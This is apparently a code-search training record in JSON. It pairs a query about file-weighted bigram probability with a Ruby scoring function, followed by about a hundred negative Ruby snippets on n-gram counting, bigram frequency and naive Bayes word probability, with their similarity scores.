"def p(trigram)\n\n bigram = trigram[1..2]\n unigram = trigram[2..2]\n # see which case we fall into for this backoff scheme\n if @counts.include?(trigram)\n # p1 function, trigram exists\n return pML(trigram, @discount)\n else\n ngram = nil\n beta_gram = nil\n alpha = 0\n if @counts.include?(bigram)\n # p2 function, no trigram but bigram exists\n ngram = bigram\n beta_gram = trigram[0..1] # the words used to help generate a beta-set of zero-count trigram\n # alpha mass redistribution\n alpha = @weights[:p2] * (1 - pML(trigram, @discount))\n else\n # p3 function, no trigram or bigram\n ngram = unigram\n beta_gram = trigram[0..0] # the words used to help generate a beta-set of zero-count bigrams\n # alpha mass redistribution\n alpha = @weights[:p3] * (1 - pML(trigram, @discount))\n end\n\n numerator = pML(ngram) \n denominator = @beta_gram_cache.fetch(beta_gram, nil) \n if not denominator\n dgram = nil\n sum = 0\n @vocab.each do |v| # all permutations of vocab words\n dgram = beta_gram + [v]\n # that are zero-count ngrams of (w,w_i-1,w_i-2) or (w,w_i-1)\n if not @counts.include?(dgram)\n # should be part of the sum of pML(w|w_i-1) or pML(w)\n sum += pML(dgram.drop(1)) # drop w_i-2 or w_i-1 as needed\n end\n end\n\n @beta_gram_cache.store(beta_gram, sum)\n denominator = sum\n end\n\n if denominator == 0 then return 0 end\n return alpha * numerator / denominator\n end\n\n end",
"def word_tag_probability(word, tag)\n denom = @tag_frequencies[tag]\n\n if denom.zero?\n 0\n else\n @word_tag_combos[\"#{word}/#{tag}\"] / denom.to_f\n end\n end",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def word_probability(word, category)\n total_words_in_category = total_word_count_in_category(category)\n return 0.0 if total_words_in_category == 0\n word_count(word, category).to_f / total_words_in_category\n end",
"def doc_probability(category)\n doc_prob = 1.0\n self.words.each do |word|\n doc_prob *= BayesCategory.where(:category=>category).first.word_probability(word[0])\n end\n doc_prob\n end",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= q(tokens[i-2..i])\n end\n probability\n end",
"def probability_of_ngrams(ngrams)\n probabilities = probabilities_for(ngrams).values\n \n return (probabilities.inject { |joint,prob| joint * prob } || 0.0)\n end",
"def bigram_compare(word1_bigrams, word2_bigrams)\n most_bigrams = [word1_bigrams.count, word2_bigrams.count].max\n num_matching(word1_bigrams, word2_bigrams).to_f / most_bigrams\n end",
"def score(other_counts)\n\t\tscore = 0.0\n\t\tseen = 0\n\t\tother_counts.each { |k, v|\n\t\t\tcount = @trigram_counts[k]\n\t\t\tscore += v * Math.log(@probs[@trigram_counts[k]])\n\t\t}\n\t\tscore\n\tend",
"def frequency_of(gram)\n @frequencies.fetch(gram,0)\n end",
"def probability_token_in_label(label, token)\n (@data[label][token] || 0).to_f / @doc_counts[label].to_f\n end",
"def weighted_probability(word)\n word = (Word === word ? word : get(word))\n\n p = BigDecimal.new(1)\n p = p * probability(word)\n p = p * file_probability(word, 1)\n #p = p * lexicon_weight(word)\n #p = p * weight_length(word)\n #p = p * weight_stem(word)\n #p = p * weight_plural(word)\n p\n end",
"def most_probable_next_word(string)\n words = string.split(\" \")\n bigram_key = words.last\n trigram_key = words.last(2).join(\" \") if words.count >= 2\n most_probable_word = \"\"\n\n ## if we can find trigram and trigram exists\n if words.count >= 2 and @trigrams[trigram_key] != nil\n # get w3 from grams with highest P(w1,w2,w3) = P(w1)*P(w2|w1)*P(w3|w1,w2)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(trigram_key + \" \" + word)\n # if P(w1)*P(w2|w1)*P(w3|w1,w2) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n\n puts \"ERROR IN TRIGRAMS\" if highest_probability == 0.0\n puts \"Trigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 3).round(4).to_s\n return most_probable_word\n ## if we can find a bigram and bigram exists\n elsif words.count >= 1 and @bigrams[bigram_key] != nil\n # get w2 from grams with highest P(w2|w1)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(bigram_key + \" \" + word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"ERROR IN BIGRAMS\" if highest_probability == 0.0\n puts \"Bigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 2).round(4).to_s\n return most_probable_word\n ## return random unigram?\n else\n highest_probability = 0.0\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"Unigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 1).round(4).to_s\n return most_probable_word\n end\n end",
"def get_token_probability(token, category_index)\n denom = @total_token_counts[category_index] + @token_counts[category_index].size * @prior_token_count \n if denom == 0\n return 0\n else\n return ((@token_counts[category_index][token] || 0) + @prior_token_count).to_f / denom\n end\n end",
"def wordprob(word, category)\n numerator = self.word_count_in_category(word, category) + 1\n denominator = self.all_word_count_in_category(category) + self.vocabularies.size\n return numerator / denominator\n end",
"def file_probability(word, threshold=0)\n word = (Word === word ? word : get(word))\n n = 1 # at least one\n word.files.each do |f, c|\n n += 1 if c > threshold\n end\n BigDecimal.new(n) / corpus_files.size\n end",
"def frequency(char)\n return 0 if (@size.nil? || @size <= 0)\n @map[char.upcase] * 100/@size\n end",
"def most_frequent_bigram(str)\n bigrams_hash = biagram_hash(str)\n bigrams_hash.key(bigrams_hash.values.max)\nend",
"def pangram?\n return @hist.size == 26\n end",
"def probabilities\n Hash[ BayesCategory.all.to_a.collect { |word|\n [word.category, probability(word.category)]\n }]\n end",
"def prob_word_dist(arr)\n\tcounts = {}\n\t(0..arr[0].size-1).each do |i|\n\t\tcounts[i] = {}\n\tend\n\tarr.each do |word|\n\t\t(0..word.size-1).each do |i|\n\t\t\tif counts[i].has_key?(word[i]) then\n\t\t\t\tcounts[i][word[i]] += 1\n\t\t\telse\n\t\t\t\tcounts[i][word[i]] = 1\n\t\t\tend\n\t\tend\n\tend\n\tresult = []\n\t(0..arr.size-1).each do |i|\n\t\tcurr_word = \"\"\n\t\t(0..arr[0].size-1).each do |j|\n\t\t\ttemp_arr = []\n\t\t\tcounts[j].keys.each do |char|\n\t\t\t\t(1..counts[i][char]) do\n\t\t\t\t\ttemp_arr.push(char)\n\t\t\t\tend\n\t\t\tend\n\t\t\tcurr_word += temp_arr[random * temp_arr.size]\n\t\tend\n\t\tresult.add[curr_word]\n\tend",
"def dictionary\n @dictionary ||= ngrams.first.probabilities \n end",
"def qML(ngram)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n # get a bigram\n dgram = ngram[0..1]\n when 2\n # get a unigram\n dgram= ngram[0..0]\n end\n\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n return @counts.fetch(ngram, 0).to_f / @counts.fetch(dgram, 0).to_f\n else\n # if the denominator count would be zero, return 0\n if @word_count == 0 then return 0 end\n return @counts.fetch(ngram, 0).to_f / @word_count.to_f\n end\n\n rescue ZeroDivisionError\n 0\n end",
"def calculate_gt_probability next_ngram: nil, ngram_model: 0, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n next_ngram_rawcount = ngram_counts[local_ngram_model][next_ngram].to_i\n\n if next_ngram_rawcount == 0 # Distributing P*(unseen)\n return good_turing_bins[local_ngram_model][1].to_f/good_turing_bins[local_ngram_model][0] if @oov_counts.nil? # if no oov are set, we assign the whole probability mass to every missing token\n return (@leftover_probability[local_ngram_model]/@oov_counts[local_ngram_model].values.sum)*@oov_counts[local_ngram_model][next_ngram] # otherwise we assign only part of it\n else\n revised_counts = get_revised_counts next_ngram: next_ngram, ngram_model: local_ngram_model\n return revised_counts.to_f/good_turing_bins[local_ngram_model][0]\n end\n end",
"def sentence_commonality(sentence)\n probability_of_ngrams(common_ngrams_from_sentence(sentence))\n end",
"def most_frequent_bigram(str)\n bigram_count = Hash.new(0)\n\n # count each bigram appearance\n (0...str.length - 1).each do |i|\n bigram = str[i] + str[i+1]\n bigram_count[bigram] += 1\n end\n\n # return most frequent bigram\n bigram_count.max_by { |k, v| v }.first\nend",
"def trigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word_1 = \"\"\n\t prev_word_2 = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word_1 != \"\" && prev_word_2 != \"\")\n\t\t @trifreq[prev_word_1 + \" \" + prev_word_2 + \" \" + word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 != \"\")\n\t\t @trifreq[\"PHI \"+prev_word_2+\" \"+word] += 1\n\t\telsif(prev_word_1 == \"\" && prev_word_2 == \"\")\n\t\t @trifreq[\"PHI PHI \"+word] += 1\t\n\t\tend \t \t\n\t\tprev_word_1 = prev_word_2 \n\t\tprev_word_2 = word\n\t }\n\t}\n end",
"def most_frequent_bigram(str)\n most_freq = \"\"\n highest_freq = 0\n bigram_hash = Hash.new(0)\n len = str.length\n (0...len-1).each { |idx| bigram_hash[str[idx..idx+1]] += 1 }\n bigram_hash.each do |k, v| \n if v > highest_freq\n most_freq = k \n highest_freq = v\n end\n end\n most_freq\nend",
"def word_prob(category, word)\n cat_freq = word_freq(category, word)\n non_cat_freq = word_freq(counter.keys, word) - cat_freq\n cat_docs = doc_size(category)\n non_cat_docs = doc_size(doc_counter.keys) - cat_docs\n\n cat_prob = [1.0 * cat_freq / cat_docs, 1.0].min\n non_cat_prob = [1.0 * non_cat_freq / non_cat_docs, 1.0].min\n\n if cat_prob == 0.0\n cond_prob = 0.4\n else\n cond_prob = 1.0 * cat_prob / (cat_prob + non_cat_prob)\n end\n\n # STDOUT.puts \"#{category}-#{word}, cat #{cat_prob}, non_cat #{non_cat_prob}, cond_p #{cond_prob}\"\n\n cond_prob = [[cond_prob, 0.99].min, 0.01].max\n end",
"def update_bigram_counts(words)\n\t(0..(words.length - 2)).each do |i|\n\t\tkey = words[i]\n\t\tif $bigrams.has_key? key\n\t\t\tcounts = $bigrams[key]\n\t\t\tif counts.has_key? words[i + 1]\n\t\t\t\tcounts[words[i + 1]] += 1\n\t\t\telse\n\t\t\t\tcounts[words[i + 1]] = 1\n\t\t\tend\n\t\telse\n\t\t\tcounts = {words[i + 1] => 1}\n\t\t\t$bigrams[key] = counts\n\t\tend\n\tend\nend",
"def construct_bigram(title)\n\t#eliminate stop words before creating bigram counts\n\tpattern = /a\\b|an\\b|and\\b|by\\b|for\\b|from\\b|in\\b|of\\b|on\\b|or\\b|out\\b|the\\b|to\\b|with\\b/ #\\b to match the end of the word so it doesnt grab an when the word is and\n\ttitle.gsub!(pattern,\"\")\n\n\ttitle_array = title.split #split the title by words. (splits by spaces by default)\n\n\tfor i in 0..title_array.length-2\n\t\t$bigrams[title_array[i]]\n\t\tif $bigrams[title_array[i]] == nil #when the key/second hash does not exist, create a new one and initialize to 0 so we can increment\n\t\t\t$bigrams[title_array[i]] = Hash.new(0)\n\t\tend\n\t\t#increment value for the key by one\n\t\t$bigrams[title_array[i]][title_array[i+1]] += 1\n\tend\nend",
"def text_commonality(text)\n probability_of_ngrams(common_ngrams_from_text(text))\n end",
"def most_frequent_bigram(str)\n count = Hash.new(0)\n\n (0...str.length - 1).each do |i|\n bigram = str[i..i + 1]\n\n count[bigram] += 1\n end\n\n count.sort_by { |k, v| v } [-1][0]\nend",
"def pML(ngram, discount=0)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n dgram = ngram[0..1]\n when 2\n dgram= ngram[0..0]\n end\n\n result = 0\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @counts.fetch(dgram, 0).to_f\n else\n if @word_count == 0 then return 0 end\n # discount the numerator if needed\n result = (@counts.fetch(ngram, 0).to_f - discount) / @word_count.to_f\n end\n\n# puts \"#{ngram.inspect} #{result}\"\n return result\n\n rescue ZeroDivisionError\n 0\n end",
"def word_prob(word, type)\n total_words_in_type = total_word_count_in_type(type)\n return total_words_in_type == 0 ? 0.0 : word_count(word, type).to_f / total_words_in_type\n end",
"def probability\n return @probability\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n (0...str.length - 1).each do |idx|\n bigram_hash[str[idx] + str[idx+1]] += 1\n end\n\n sorted = bigram_hash.sort_by { |k, v| v }\n sorted[-1][0]\nend",
"def pEstimate(sentence)\n probability = 1\n tokens = sentence.split\n (2..(tokens.size-1)).to_a.each do |i|\n probability *= p(tokens[i-2..i])\n end\n probability\n end",
"def most_frequent_bigram(str)\n counts = Hash.new(0)\n (0...str.length-1).each do |i|\n bigram = str[i..i + 1]\n counts[bigram] += 1\n end\n\n sorted = counts.sort_by { |h,v| v } # sorts by value \n sorted.last[0]\nend",
"def most_frequent_bigram(str)\n binaries = [] \n letters = str.split(\"\") #\"thrill\"\n (0...(letters.length-1)).each_with_index do |letter,idx|\n binaries << (letters[idx] + letters[(idx + 1)])\n end\n hash = Hash.new(0)\n binaries.each do |pairs|\n hash[pairs] += 1 \n end\n sorted = hash.sort_by { |k , v| v }\n return sorted[-1][0]\nend",
"def most_frequent_bigram(str)\n h = Hash.new(0)\n bigrams = (0..str.length-2).map{|i| str[i..i+1]}\n bigrams.each {|bi| h[bi] += 1}\n h.key(h.values.max)\nend",
"def word_frequency(text)\n norm_array = normalize(text).to_a\n freq = { }\n norm_array.each_with_object(Hash.new(0)){|key,hash| hash[key] += 1}\nend",
"def document_frequency\n @corpus.each_with_object({}) do |doc, df|\n doc.bag_of_words.keys.each do |word|\n df[word] = (df.fetch(word) { 0.0 }) + 1.0\n end\n end\n end",
"def most_frequent_bigram(str)\n bigram_hash = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigram_hash[str[i..i+1]] += 1\n i += 1\n end\n\n bigram_hash.max_by {|k, v| v}[0]\nend",
"def calculate_match_probability\n # two heuristics: \n # 1 is are their multiple words in term_text? if so, mark as probable\n # if not, does it match the anchor regexp? if so, mark as probable\n # else, mark as improbable\n \n # multiple words?\n anchor_regexp = \"(featuring|plus|the|presents|with|plus|and|\\,|\\&|[()]|\\/|\\:|\\-|^|$)\"\n nix_regexp = \"parking|\\svs\\.?\\s\" \n if artist_name=~/#{nix_regexp}/i\n self.match_probability=\"unlikely\"\n return nil\n end\n text=term_text.strip\n if text[\" \"]\n self.match_probability=\"likely\"\n return \"multpl\"\n end\n if artist_name=~/#{anchor_regexp}\\s*#{text}\\s*#{anchor_regexp}/i\n self.match_probability=\"likely\"\n return \"regexp\"\n end\n# if artist_name=~/#{anchor_regexp}\\s+?#{text}\\s+?#{anchor_regexp}/i\n# match_probability=\"likely\"\n# return \"regexp\"\n# end\n self.match_probability=\"unlikely\"\n return nil\n end",
"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def probability_token_is_label(token, label, prob_label)\n token_count = token_count(token)\n prob_token = token_count / @doc_counts.values.reduce(:+).to_f\n return nil if prob_token == 0.0\n\n prob_token_in_label = probability_token_in_label(label, token)\n (prob_token_in_label * prob_label) / prob_token\n end",
"def probability var, val\n unless self.count.zero?\n self.count{|r| r[var] == val}.fdiv(self.count)\n else\n 0\n end\n end",
"def percent_of_word(word)\n @total_count = SubWordJoin.where(word: word).count\n puts @total_count\n sub_count = 0\n @sub = SubDriver.where(driver: self)\n @sub.each do |sub|\n sub_count += SubWordJoin.where(word: word, sub_driver: sub).count\n end\n\n percent = (sub_count.to_f/@total_count)*100\n return percent.round(2)\n\n end",
"def freq\n @freq ||= begin\n # calculate ngram counts for the haystack\n counts = Hash.new(0)\n veach(\"Haystack\", @haystack) do |element|\n element.ngrams.each do |ngram|\n counts[ngram] += 1\n end\n end\n\n # turn counts into inverse frequencies\n map = Hash.new(1)\n total = counts.values.inject(&:+).to_f\n counts.each do |ngram, count|\n map[ngram] = ((total / count) * 10).round\n end\n map\n end\n end",
"def word_freq(text)\n frequency = {}\n unique_words(text).each do |word|\n frequency[word] = 0\n end\n split_normalise(text).each do |word|\n frequency[word] += 1\n end\n frequency\nend",
"def calculate\n document_frequency.each_with_object({}) do |(word, freq), idf|\n idf[word] = Math.log(@corpus.size/freq)\n end\n end",
"def calculate_probability(useful_results, reroll_count)\n return 100.0 * useful_results / ( 6 ** reroll_count )\n end",
"def probability_of_class(classification)\n @number_of_documents_in_class[classification] / @number_of_documents.to_f\n end",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def contar(texto)\n palavras = texto.split\n\n frequencies = Hash.new(0)\n\n palavras.each do |word|\n frequencies [word] += 1\n end\n\n frequencies = frequencies.sort_by do |wor, count|\n end\n frequencies.reverse!\n\n frequencies.each do |wor, count|\n puts wor + \" \" + count.to_s\n end\nend",
"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def gramos\r\n grams = 0\r\n @lista_alimentos.each do |i|\r\n grams += 100\r\n end\r\n return grams\r\n end",
"def frequency\n counts = Hash.new(0)\n self.words.each { |word| counts[word] += 1 }\n counts\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def score(sentence)\n total_scores = 0\n rep_array = @sent_rep_compiler.compile(sentence)\n rep_array.each { |word| total_scores += @wts_scores_obj[word.id] }\n total_scores / rep_array.length\n end",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def english?(text)\n num_english = 0\n text_words = text.split(\" \")\n text_words.each do |text_word|\n WORDS_BY_FREQUENCY.each do |dict_word|\n if text_word == dict_word.upcase\n num_english += 1\n break\n end\n end\n end\n return num_english.to_f / text_words.length > 0.75\nend",
"def score\n @score ||= phonetic_levenshtein_distance + penalties\n end",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n\n str.each_char.with_index do |char, i|\n if i != str.length - 1\n bigram = char + str[i + 1]\n end\n hash[bigram] += 1\n end\n most_frequent = hash.values.max\n hash.each { |k, v| return k if v == most_frequent}\n\nend",
"def frequency(text)\n text = text.downcase.gsub(/\\s*/, '')\n chars = text.split('')\n freqs = Hash[('a'..'z').to_a.zip([0] * 26)]\n\n chars.each { |c| freqs[c] += 1 }\n\n freqs\n end",
"def most_frequent_bigram(str)\n most_frequent_bigram = Hash.new(0)\n\n str.each_char.with_index do |char, index|\n bigram = \"#{char}#{str[index + 1]}\"\n most_frequent_bigram[bigram] += 1\n end\n\n max_count = most_frequent_bigram.sort_by {|k, v| v}\n max_count[-1][0]\nend",
"def fragment_commonality(fragment)\n probability_of_ngrams(common_ngrams_from_fragment(fragment))\n end",
"def grams\n gram_equivalent / amount\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index {|c, i| hash[c + str[i+1]] += 1 if str[i + 1]}\n hash.key(hash.values.max)\nend",
"def term_frequency(document, term)\n tf = document.term_count(term)\n if @function == :bm25\n (tf * 2.2) / (tf + 0.3 + 0.9 * documents.size / @model.average_document_size)\n else\n sqrt(tf)\n end\n end",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def get_sentence_progresses\n if @all_sentence_count > 0\n @progress_sentence_ch = 100 * @memorized_sentence_count_ch / @all_sentence_count\n @progress_sentence_ja = 100 * @memorized_sentence_count_ja / @all_sentence_count\n else\n @progress_sentence_ch = 0\n @progress_sentence_ja = 0\n end\n end",
"def probabilities_for(ngrams)\n table = {}\n\n ngrams.each do |ngram|\n table[ngram] = probability_of_ngram(ngram)\n end\n\n return table\n end",
"def popularity_boost\n return 0 if word_datas.empty?\n\n rare_words = word_datas.select { |data| data[:rarity] }\n return 0 if rare_words.empty?\n\n # 0-1 score for popularity\n # Then divide it by 0-1 for word length\n boosts = rare_words.map do |word|\n 1 - Math.log(word[:rarity] + 1, 60_000)\n end\n boosts.reduce(0, &:+)\n end",
"def has_gram?(gram)\n @frequencies.has_key?(gram)\n end",
"def score_freq(cs)\n \" eta\".each_char.map { |c| cs.index(c) || 9999 }.reduce(&:+)\nend",
"def percentages\n @_percentages ||= words.each_with_object({}) do |word_count, hash|\n hash[word_count.first] = percentage(word_count.last)\n end\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def score_title title, freq_list\n title\n .split\n .map{|word| is_initialism(word) ? 4 : score_for_frequency(freq_list[sanitize word])}\n .inject(:+)\n end",
"def phonetic_coverage\n 1 - phones_in_word_list/@initial_phones.to_f\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def most_frequent_bigram(str)\n counter = Hash.new(0)\n (0...str.length-1).each { |i| counter[str[i] + str[i+1]] += 1 }\n sorted = counter.sort_by { |k, v| v }\n sorted[-1][0]\nend"
] | [
"0.7525785",
"0.73970234",
"0.70978487",
"0.6869366",
"0.68479264",
"0.68038917",
"0.6729877",
"0.6543553",
"0.64418244",
"0.6419717",
"0.6325295",
"0.63038254",
"0.62904406",
"0.62812465",
"0.62567854",
"0.62363577",
"0.62209475",
"0.6212022",
"0.62085927",
"0.6198233",
"0.6188971",
"0.61854017",
"0.6178421",
"0.61348134",
"0.6121978",
"0.6111741",
"0.6073402",
"0.6071395",
"0.60710406",
"0.6024717",
"0.5990377",
"0.5990095",
"0.59848964",
"0.594559",
"0.5936904",
"0.5930776",
"0.59094816",
"0.589197",
"0.5874413",
"0.58641505",
"0.5857109",
"0.5852107",
"0.5848248",
"0.5841763",
"0.58180803",
"0.58155346",
"0.5814226",
"0.5809941",
"0.58047205",
"0.5796977",
"0.578404",
"0.5783301",
"0.577499",
"0.57727563",
"0.5769943",
"0.5766564",
"0.57592744",
"0.5750287",
"0.5750269",
"0.57475096",
"0.57460743",
"0.5720607",
"0.571913",
"0.5708175",
"0.5697505",
"0.5680021",
"0.5679883",
"0.567592",
"0.567302",
"0.5669892",
"0.5669096",
"0.56497025",
"0.56450146",
"0.5630032",
"0.56216925",
"0.5618389",
"0.5617837",
"0.56172067",
"0.55966276",
"0.55929476",
"0.5587389",
"0.55819714",
"0.55800414",
"0.5577533",
"0.55715036",
"0.5570117",
"0.5560356",
"0.5555435",
"0.5552366",
"0.5550079",
"0.55496424",
"0.55377394",
"0.55352867",
"0.5533176",
"0.55292755",
"0.55235726",
"0.5521859",
"0.5518092",
"0.551356",
"0.55128646"
] | 0.6757227 | 6 |
File weighted probablity of the bigram appearing in the corpus. TODO: Don't count file probability. | def score(word1, word2=nil)
weight = 1 #file_probability(word1, word2)
weight * probability(word1, word2)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def file_probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.files.size) / analysis.files.size\n end",
"def file_probability(word, threshold=0)\n word = (Word === word ? word : get(word))\n n = 1 # at least one\n word.files.each do |f, c|\n n += 1 if c > threshold\n end\n BigDecimal.new(n) / corpus_files.size\n end",
"def weighted_probability(word)\n word = (Word === word ? word : get(word))\n\n p = BigDecimal.new(1)\n p = p * probability(word)\n p = p * file_probability(word, 1)\n #p = p * lexicon_weight(word)\n #p = p * weight_length(word)\n #p = p * weight_stem(word)\n #p = p * weight_plural(word)\n p\n end",
"def probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.count) / total #size\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def probability_of(gram)\n @probabilities.fetch(gram,0.0)\n end",
